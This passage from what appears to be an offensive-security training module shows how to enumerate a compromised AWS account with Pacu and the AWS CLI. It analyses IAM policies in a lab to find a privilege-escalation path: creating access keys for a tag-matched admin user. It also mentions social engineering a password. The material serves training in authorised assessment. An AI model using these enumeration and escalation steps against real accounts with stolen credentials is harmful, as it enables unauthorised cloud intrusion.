Listing 72 - Installing pacu on Kali Linux using the package manager
Next, we'll run pacu without any arguments to start Pacu in interactive mode. Pacu organizes assessments into sessions. The first time we run pacu it will prompt for a session name and create a session.
Let's create a session and name it enumlab.
kali@kali:~$ pacu
....
Database created at /root/.local/share/pacu/sqlite.db
What would you like to name this new session? enumlab
Session enumlab created.
...
Pacu (enumlab:No Keys Set) >
Listing 73 - Starting pacu in interactive mode
Once the session is created, pacu displays a list of available commands and produces a new command prompt showing that we are in interactive mode inside the enumlab section.
Notice the No Keys Set message shown in the prompt. We can quickly set keys from the AWS CLI credentials file with the import-keys command followed by a profile name configured in AWS CLI. Let's import the target profile.
Pacu (enumlab:No Keys Set) > import_keys target
Imported keys as "imported-target"
Pacu (enumlab:imported-target) >
Listing 43 - Importing the target profile credentials in pacu.
The command prompt now indicates that we are using the keys imported from the target profile.
Before we run any commands, it's important that we monitor the Cloudtrail event history using the monitoring user credentials. This helps us study the actions the module is executing, further understand what an actual attack might look like and determine the amount of log noise our actions generate. We can also use this knowledge as a foundation for our own tools. If you have closed the Cloudtrail event history window, go ahead and open that now before we continue.
We are now ready to explore the enumeration modules. We can use ls to list all available modules.
Pacu (enumlab:imported-target) > ls
...
[Category: ENUM]
enum__secrets
codebuild__enum
ecs__enum
dynamodb__enum
aws__enum_spend
iam__enum_permissions
aws__enum_account
route53__enum
ec2__download_userdata
lightsail__enum
ecs__enum_task_def
ecr__enum
rds__enum
ebs__enum_volumes_snapshots
cloudformation__download_data
inspector__get_reports
guardduty__list_findings
guardduty__list_accounts
iam__detect_honeytokens
iam__bruteforce_permissions
lambda__enum
apigateway__enum
ec2__check_termination_protection
iam__enum_users_roles_policies_groups
ec2__enum
iam__get_credential_report
glue__enum
acm__enum
systemsmanager__download_parameters
...
Listing 74 - Listing all Modules in Pacu
Now let's run help iam__enum_users_roles_policies_groups to learn about this module.
Pacu (enumlab:imported-target) > help iam__enum_users_roles_policies_groups
iam__enum_users_roles_policies_groups written by Spencer Gietzen of Rhino Security Labs.
usage: pacu [--users] [--roles] [--policies] [--groups]
This module requests the info for all users, roles, customer-managed
policies, and groups in the account. If no arguments are supplied, it
will enumerate all four, if any are supplied, it will enumerate those
only.
options:
--users Enumerate info for users in the account
--roles Enumerate info for roles in the account
--policies Enumerate info for policies in the account
--groups Enumerate info for groups in the account
Listing 75 - Getting usage help for a Module in Pacu.
This module works similarly to the get-account-authorization-details subcommand. It returns all the information related to IAM identities and policies. Let's run the module without any arguments so that it will return all info.
Pacu (enumlab:imported-target) > run iam__enum_users_roles_policies_groups
Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 18 users
[iam__enum_users_roles_policies_groups] Found 20 roles
[iam__enum_users_roles_policies_groups] Found 8 policies
[iam__enum_users_roles_policies_groups] Found 8 groups
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.
[iam__enum_users_roles_policies_groups] MODULE SUMMARY:
18 Users Enumerated
20 Roles Enumerated
8 Policies Enumerated
8 Groups Enumerated
IAM resources saved in Pacu database.
Listing 76 - Running the iam__enum_users_roles_policies_groups Module in Pacu
The module found resources but note that the data was saved in Pacu's database as highlighted above. To display a list of services that have collected data in the current session we'll run the services command. Then we can run the data <service> command to display all data for the specified service in the session. Note that running the data command without any arguments will print all the data stored in the current session.
Pacu (enumlab:imported-target) > services
IAM
Pacu (enumlab:imported-target) > data IAM
{
"Groups": [
{
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
"GroupId": "AGPAQOMAIGYUZQMC6G5NM",
"GroupName": "admin",
"Path": "/admin/"
},
{
"Arn": "arn:aws:iam::123456789012:group/amethyst/amethyst_admin",
"GroupId": "AGPAQOMAIGYUYF3JD3FXV",
"GroupName": "amethyst_admin",
"Path": "/amethyst/"
},
...
Listing 77 - Reviewing the data collected in Pacu
According to the output, pacu collects the attributes that the tool's author considers relevant, which align with those we highlighted earlier: name, ARN and path.
Tools like Pacu abstract the process of collecting data, eliminating the need to learn specific AWS CLI commands. However, it's important to note that if the compromised credentials belong to an identity without authorization to access this information, no data will be received.
In this section, we presented another way to gather IAM information from a compromised account. In the next section, we'll analyze the data to extract valuable insights.
24.5.5. Extracting Insights from Enumeration Data
After collecting data, the next critical step is to sift through the data to extract valuable information and insights. This phase is crucial because raw enumeration data can be lengthy and it contains various information, some of which may be redundant, irrelevant, or benign. Proper analysis helps us identify the critical aspects of the data that can provide meaningful and actionable intelligence.
To correctly identify valuable insights we need to have clear objectives and understand what we are trying to achieve. Are we searching for vulnerabilities, business insights or system inefficiencies? Do we need to escalate privileges to obtain more insights? Having a clear goal helps us to focus on relevant data.
For example, let's assume that after gaining an initial compromise to our lab cloud environment, the attacker's goal is to escalate their current privileges to Administrator access. We won't delve into privilege escalation attacks and exploiting the environment, as that's beyond the scope of this module. Instead, we'll focus on analyzing and discovering potential attack paths.
From the information collected so far after scoping IAM permissions we learned that with the current compromised access, we can execute many read-only actions but we can't change anything in the environment. However, the scope of actions we can execute is wide and we were able to collect the whole IAM configuration and list other resources. This is enough to define some escalation paths to accomplish the goal.
Let's start with an obvious path. We'll analyze the admin-alice IAM user's data from the output of the get-account-authorization-details IAM subcommand.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "UserDetailList[?UserName=='admin-alice']"
[
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYU3FWX3JOFP",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
"GroupList": [
"amethyst_admin",
"admin"
],
"AttachedManagedPolicies": [],
"Tags": [
{
"Key": "Project",
"Value": "amethyst"
}
]
}
]
Listing 78 - Getting the "admin-alice" IAM user details
Several details indicate this might be a fully-privileged user. For instance, the username contains "admin", and it's also a member of the admin User Group. There is another indicator that we can identify but we'll leave that as an exercise for later.
Also, notice that this IAM resource has a tag, a custom attribute label that we can assign to identify and organize AWS resources. Administrators often use tags to authorize access and operations. Each tag has two parts: a tag key and an optional field known as a tag value. In this case, the tag has a key set to Project and a value set to amethyst. We should pay attention to tags as they can reveal more about a resource.
Tip
Attribute-Based Access Control (ABAC) is an authorization strategy in which a subject's permission to perform a set of operations is determined by evaluating attributes associated with that subject. Tags are commonly used as attributes to implement ABAC in public cloud environments.
We also observe that the IAM user doesn't have any associated inline or managed policies, suggesting that the user probably inherits policies from its groups. Let's check the information of the two groups that the user belongs to.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "GroupDetailList[?GroupName=='admin']"
[
{
"Path": "/admin/",
"GroupName": "admin",
"GroupId": "AGPAQOMAIGYUXBR7QGLLN",
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
"GroupPolicyList": [],
"AttachedManagedPolicies": [
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
}
]
}
]
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "GroupDetailList[?GroupName=='amethyst_admin']"
[
{
"Path": "/amethyst/",
"GroupName": "amethyst_admin",
"GroupId": "AGPAQOMAIGYUX23CDL3AN",
"Arn": "arn:aws:iam::123456789012:group/amethyst/amethyst_admin",
"GroupPolicyList": [],
"AttachedManagedPolicies": [
{
"PolicyName": "amethyst_admin",
"PolicyArn": "arn:aws:iam::123456789012:policy/amethyst/amethyst_admin"
}
]
}
]
Listing 79 - Getting the "admin" and "amethyst_admin" User Groups details
The AdministratorAccess policy is an AWS managed policy that grants full access to all AWS services and resources. The simplest way to obtain the policy document of any AWS managed policy, including the AdministratorAccess policy, is from the documentation, available at the AdministratorAccess Policy Document
From the documentation page, we get the following policy document. Let's analyze it.
{
"Version" : "2012-10-17",
"Statement" : [
{
"Effect" : "Allow",
"Action" : "*",
"Resource" : "*"
}
]
}
Listing 80 - Analyzing the AdminitratorAccess Policy Document
Notice that the JSON policy document uses the "*" wildcard in both Action and Resource elements. This is overly-permissive, since any user in the admin group, such as admin-alice, becomes a potential target for privilege escalation in the environment.
Let's pause for a moment to analyze the situation. So far we have identified two paths to full-privileged access.
One path might be to find a way to run actions with the admin-alice user privileges. One external approach might be to social engineer Alice's password to enter the management console, especially because we previously confirmed that there is no multi-factor authentication configured for any user. Another approach would be to search for other credentials that have permission to modify the admin-alice credentials. In this case, we could look for policies with iam:"*", or iam:CreateAccessKey allowed actions.
A second path would include obtaining credentials for another member of the admin user group or find a user that has permission to add users to the admin group. To accomplish this, we could search for policies with iam:"*", or iam:AddUserToGroup allowed actions.
To continue the analysis let's display the policies associated with the amethyst_admin user group to learn what actions the admin-alice user inherits from it. We'll continue using the get-account-authorization-details IAM subcommand to get this information.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter LocalManagedPolicy --query "Policies[?PolicyName=='amethyst_admin']"
[
{
"PolicyName": "amethyst_admin",
"PolicyId": "ANPAQOMAIGYUUA3PZUK57",
"Arn": "arn:aws:iam::123456789012:policy/amethyst/amethyst_admin",
"Path": "/amethyst/",
"DefaultVersionId": "v7",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"PolicyVersionList": [
{
"Document": {
"Statement": [
{
"Action": "iam:*",
"Effect": "Allow",
"Resource": [
"arn:aws:iam::123456789012:user/amethyst/*",
"arn:aws:iam::123456789012:group/amethyst/*",
"arn:aws:iam::123456789012:role/amethyst/*",
"arn:aws:iam::123456789012:policy/amethyst/*"
],
"Sid": "AllowAllIAMActionsInUserPath"
},
{
"Action": "iam:*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/Project": "amethyst"
}
},
"Effect": "Allow",
"Resource": "arn:aws:iam::*:user/*",
"Sid": "AllowAllIAMActionsInGroupMembers"
},
{
"Action": [
"ec2:*",
"lambda:*"
],
"Condition": {
"StringEquals": {
"aws:ResourceTag/Project": "amethyst"
}
},
"Effect": "Allow",
"Resource": "*",
"Sid": "AllowAllActionsInTaggedResources"
},
{
"Action": [
"ec2:*",
"lambda:*"
],
"Condition": {
"StringEquals": {
"aws:RequestTag/Project": "amethyst"
}
},
"Effect": "Allow",
"Resource": "*",
"Sid": "AllowAllActionsInTaggedResources2"
},
{
"Action": "s3:*",
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::amethyst*",
"arn:aws:s3:::amethyst*/*"
],
"Sid": "AllowAllS3ActionsInPath"
}
],
"Version": "2012-10-17"
},
"IsDefaultVersion": true,
},
}
]
Listing 81 - Getting the "amethyst_admin" policy statements
This provides details about the amethyst_admin policy. Let's focus on the PolicyVersionList section which holds the Policy Statements, essentially the permission definitions.
The Policy Document contains a few Statements: AllowAllIAMActionsInUserPath, AllowAllIAMActionsInGroupMembers, AllowAllActionsInTaggedResources, AllowAllActionsInTaggedResources2, and AllowAllS3ActionsInPath. These statements are designed to permit actions for IAM, as well as other compute and storage services. However, these actions are constrained to only those resources associated with the amethyst project either by tag or path. It's safe to assume that these statements are potentially over-permissive.
Caution
The use of the "*" wildcard in a policy often raises concerns regarding the potential over-permissiveness of that policy.
Let's analyze the AllowAllIAMActionsInGroupMembers statement. This rule allows any IAM action to run on any resource that has a tag with a key-value pair equal to "Project:amethyst". This would prevent the administrator users of this project from modifying users from other projects.
For some reason, the admin-alice user, which is highly-privileged, is a member of the amethyst_admin group and the user is also tagged with the project name. The main problem is the tag, because any user who is a member of the amethyst_admin group can run dangerous actions like creating new access keys (iam:CreateAccessKey) for the admin-alice user, granting access with the privileges of this user. So, getting credentials from the admin-cbarton IAM user could lead to privilege escalation.
The following figure describes a path an attacker may take to escalate the admin-cbarton user to an Effective Admin. This image was created by Awspx, a graph-based tool for visualizing effective access and resource relationships within AWS.
The path reveals that the user admin-cbarton, positioned at the bottom-left, is a member of the amethyst_admin group and thereby inherits the amethyst_admin policy. At the top, we find admin-alice, a member of the admin group, linked to the AdministratorAccess policy, which makes this user an Effective Admin. The path indicates that the admin-cbarton user has permission to impersonate the higher-privileged admin-alice user.
This is an example of extrapolating valuable insights from the enumerated data. We have discovered a new attack path. Although this is not a direct path within our current level of access, identifying these insights can guide our subsequent strategic decisions and actions to accomplish the goal.
In the lab, we can experiment with attack vectors using the IAM user challenge. This user is granted the iam:CreateAccessKey action, enabling it to generate credentials to interface with any other user within the lab environment. For example, we can create access keys for the admin-cbarton IAM user and validate that we can escalate privileges as we learned before.
In this lab, we worked through a simplified environment focusing primarily on IAM resources. But in the real world, sifting through the potentially large volume of enumeration data in search of actionable insights can be highly labor-intensive.
Automated tools can help manage this data. They are typically designed to present the data in a more organized and visual manner, making it easier to understand the details. For example, Cloudmapper provides visual representations of AWS configurations, helping identify potential issues. We also mentioned Awspx which is useful for analyzing how IAM resources interlink. The selection of a particular tool often depends on the type of assessment and the desired outcomes.
24.6. Wrapping Up
AWS reconnaissance is an important stage that lets us gather information from the target. By interacting with publicly available services and resources, we learn about the service provider and cloud resources the target uses. We also explored some examples in AWS about how to abuse the public CSP API to gather information about the target from an external account.
Using the information from reconnaissance, we can identify potential weaknesses in the target's infrastructure and services. This analysis allows us to tailor our attack vectors and devise social engineering tactics aimed at infiltrating the target's systems more effectively and efficiently.
In this module, we discussed AWS reconnaissance methods that often follow an initial compromise of a public cloud environment. We focused on collecting important information about the scope of access we gained in the environment. Occasionally, we can determine the level of authorization by directly querying for that information with the compromised credentials. However, if we lack permissions to access this data, we must resort to some guesswork or using an automated tool that scopes the level of access through brute force, though this approach is not advisable if our goal is to remain undetected.
We then enumerated additional IAM resources in the compromised account and discussed the differences between manual and automated enumeration. To conclude, we analyzed the information gathered to identify potential paths for gaining administrative access in the compromised environment.
- © 2024 OffSec |
- Privacy |
- Terms of service
Previous Module
Lateral Movement in Active Directory
Next Module
Attacking AWS Cloud Infrastructure